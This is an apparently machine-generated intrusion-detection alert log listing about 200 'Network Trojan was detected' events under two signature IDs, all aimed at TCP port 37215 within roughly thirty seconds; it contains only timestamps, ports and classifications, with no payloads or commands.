          Timestamp:06/09/24-16:33:38.305023
          SID:2835222
          Source Port:40904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603854
          SID:2829579
          Source Port:35470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077854
          SID:2835222
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899339
          SID:2835222
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156717
          SID:2829579
          Source Port:39648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.229998
          SID:2835222
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713576
          SID:2829579
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465348
          SID:2829579
          Source Port:44206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944537
          SID:2829579
          Source Port:58788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541551
          SID:2835222
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.086483
          SID:2835222
          Source Port:41814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037112
          SID:2835222
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719906
          SID:2829579
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413022
          SID:2829579
          Source Port:35106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075135
          SID:2829579
          Source Port:43828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823178
          SID:2835222
          Source Port:47788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075021
          SID:2835222
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818692
          SID:2829579
          Source Port:36184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224944
          SID:2829579
          Source Port:57554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077919
          SID:2835222
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119913
          SID:2835222
          Source Port:44446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399779
          SID:2835222
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600297
          SID:2829579
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713476
          SID:2835222
          Source Port:42666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288112
          SID:2829579
          Source Port:44882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.086533
          SID:2829579
          Source Port:38770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559774
          SID:2829579
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162353
          SID:2829579
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719713
          SID:2835222
          Source Port:39970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125701
          SID:2835222
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918931
          SID:2835222
          Source Port:54018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472416
          SID:2835222
          Source Port:33680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668717
          SID:2835222
          Source Port:49462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988965
          SID:2835222
          Source Port:44048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716780
          SID:2829579
          Source Port:41440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167496
          SID:2829579
          Source Port:43998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284938
          SID:2829579
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567698
          SID:2835222
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032892
          SID:2835222
          Source Port:38270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468424
          SID:2835222
          Source Port:56808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169708
          SID:2835222
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074615
          SID:2829579
          Source Port:54864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918082
          SID:2829579
          Source Port:46150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004454
          SID:2835222
          Source Port:51260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164602
          SID:2835222
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415401
          SID:2829579
          Source Port:46550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284804
          SID:2829579
          Source Port:43050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870693
          SID:2829579
          Source Port:43986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916944
          SID:2829579
          Source Port:47560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719024
          SID:2829579
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473477
          SID:2829579
          Source Port:50166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917754
          SID:2829579
          Source Port:50806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818937
          SID:2835222
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208922
          SID:2835222
          Source Port:42520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012746
          SID:2835222
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929842
          SID:2829579
          Source Port:40556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080438
          SID:2835222
          Source Port:45628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821076
          SID:2835222
          Source Port:53024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720107
          SID:2835222
          Source Port:36384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561776
          SID:2829579
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035928
          SID:2829579
          Source Port:50782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294247
          SID:2829579
          Source Port:54450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285599
          SID:2829579
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895749
          SID:2829579
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646376
          SID:2835222
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946897
          SID:2829579
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924597
          SID:2829579
          Source Port:48324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277186
          SID:2829579
          Source Port:38616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677125
          SID:2835222
          Source Port:47808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102201
          SID:2835222
          Source Port:32856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929409
          SID:2835222
          Source Port:50146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471938
          SID:2835222
          Source Port:41080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948653
          SID:2835222
          Source Port:55960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720180
          SID:2829579
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034260
          SID:2829579
          Source Port:43150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644824
          SID:2835222
          Source Port:60948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467986
          SID:2835222
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990345
          SID:2829579
          Source Port:35012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466264
          SID:2829579
          Source Port:43032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397690
          SID:2829579
          Source Port:35858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945947
          SID:2829579
          Source Port:58484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415733
          SID:2829579
          Source Port:32844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945421
          SID:2835222
          Source Port:53332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926031
          SID:2829579
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821296
          SID:2829579
          Source Port:57254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245474
          SID:2835222
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398115
          SID:2829579
          Source Port:41276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104836
          SID:2829579
          Source Port:48160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718721
          SID:2835222
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166363
          SID:2835222
          Source Port:58170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034292
          SID:2835222
          Source Port:35260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226951
          SID:2829579
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947485
          SID:2829579
          Source Port:41316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033870
          SID:2835222
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469339
          SID:2835222
          Source Port:58872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.015056
          SID:2829579
          Source Port:52862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028040
          SID:2835222
          Source Port:51344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103226
          SID:2835222
          Source Port:52648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676264
          SID:2829579
          Source Port:36206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925312
          SID:2829579
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400227
          SID:2829579
          Source Port:38302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397217
          SID:2829579
          Source Port:45734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862641
          SID:2835222
          Source Port:57688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867724
          SID:2835222
          Source Port:38178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720207
          SID:2829579
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284159
          SID:2835222
          Source Port:50100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246531
          SID:2835222
          Source Port:39136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.476144
          SID:2835222
          Source Port:34694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166678
          SID:2829579
          Source Port:36396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289198
          SID:2829579
          Source Port:50438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947855
          SID:2835222
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162948
          SID:2829579
          Source Port:59786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031395
          SID:2835222
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168152
          SID:2835222
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289456
          SID:2829579
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400357
          SID:2835222
          Source Port:60230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079101
          SID:2835222
          Source Port:47358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077668
          SID:2835222
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246771
          SID:2829579
          Source Port:52478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684677
          SID:2835222
          Source Port:41124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643404
          SID:2829579
          Source Port:38384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984170
          SID:2829579
          Source Port:56612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418813
          SID:2829579
          Source Port:34042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028212
          SID:2829579
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647723
          SID:2829579
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067270
          SID:2835222
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397263
          SID:2835222
          Source Port:40040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295362
          SID:2835222
          Source Port:54586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720099
          SID:2829579
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413573
          SID:2835222
          Source Port:46216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080569
          SID:2835222
          Source Port:49930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987923
          SID:2835222
          Source Port:56646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719795
          SID:2835222
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226428
          SID:2835222
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164520
          SID:2829579
          Source Port:41650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989702
          SID:2829579
          Source Port:41622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.953118
          SID:2835222
          Source Port:37488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281928
          SID:2829579
          Source Port:52124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167572
          SID:2829579
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869067
          SID:2835222
          Source Port:41002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283746
          SID:2829579
          Source Port:41982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286873
          SID:2829579
          Source Port:36720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166815
          SID:2829579
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168209
          SID:2829579
          Source Port:49638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987780
          SID:2835222
          Source Port:48290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645228
          SID:2829579
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476144
          SID:2829579
          Source Port:41404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862710
          SID:2835222
          Source Port:55168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163289
          SID:2835222
          Source Port:55972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166218
          SID:2835222
          Source Port:48076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209019
          SID:2835222
          Source Port:42072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163182
          SID:2835222
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714829
          SID:2829579
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718174
          SID:2829579
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283810
          SID:2829579
          Source Port:56284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651643
          SID:2835222
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079362
          SID:2829579
          Source Port:46946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102652
          SID:2829579
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819887
          SID:2835222
          Source Port:39530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601805
          SID:2829579
          Source Port:33074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636238
          SID:2835222
          Source Port:33616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295672
          SID:2835222
          Source Port:52934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897883
          SID:2835222
          Source Port:42346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078951
          SID:2829579
          Source Port:50960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222792
          SID:2829579
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399883
          SID:2829579
          Source Port:41958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945738
          SID:2829579
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925506
          SID:2829579
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922941
          SID:2829579
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034515
          SID:2835222
          Source Port:48534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230693
          SID:2835222
          Source Port:39976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539209
          SID:2835222
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.474271
          SID:2829579
          Source Port:34338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030745
          SID:2829579
          Source Port:36306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076653
          SID:2835222
          Source Port:47190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821650
          SID:2829579
          Source Port:57402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948793
          SID:2835222
          Source Port:54670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077205
          SID:2835222
          Source Port:52006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412654
          SID:2835222
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947992
          SID:2835222
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557937
          SID:2829579
          Source Port:52836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948595
          SID:2829579
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946715
          SID:2829579
          Source Port:46506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292168
          SID:2829579
          Source Port:33496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415996
          SID:2829579
          Source Port:44132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721307
          SID:2835222
          Source Port:40600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990434
          SID:2829579
          Source Port:59328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419021
          SID:2829579
          Source Port:59182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567333
          SID:2829579
          Source Port:46496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035722
          SID:2835222
          Source Port:40654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863908
          SID:2829579
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018151
          SID:2829579
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035698
          SID:2829579
          Source Port:49144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273623
          SID:2835222
          Source Port:41258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861167
          SID:2835222
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205155
          SID:2835222
          Source Port:56258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718660
          SID:2829579
          Source Port:44808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718232
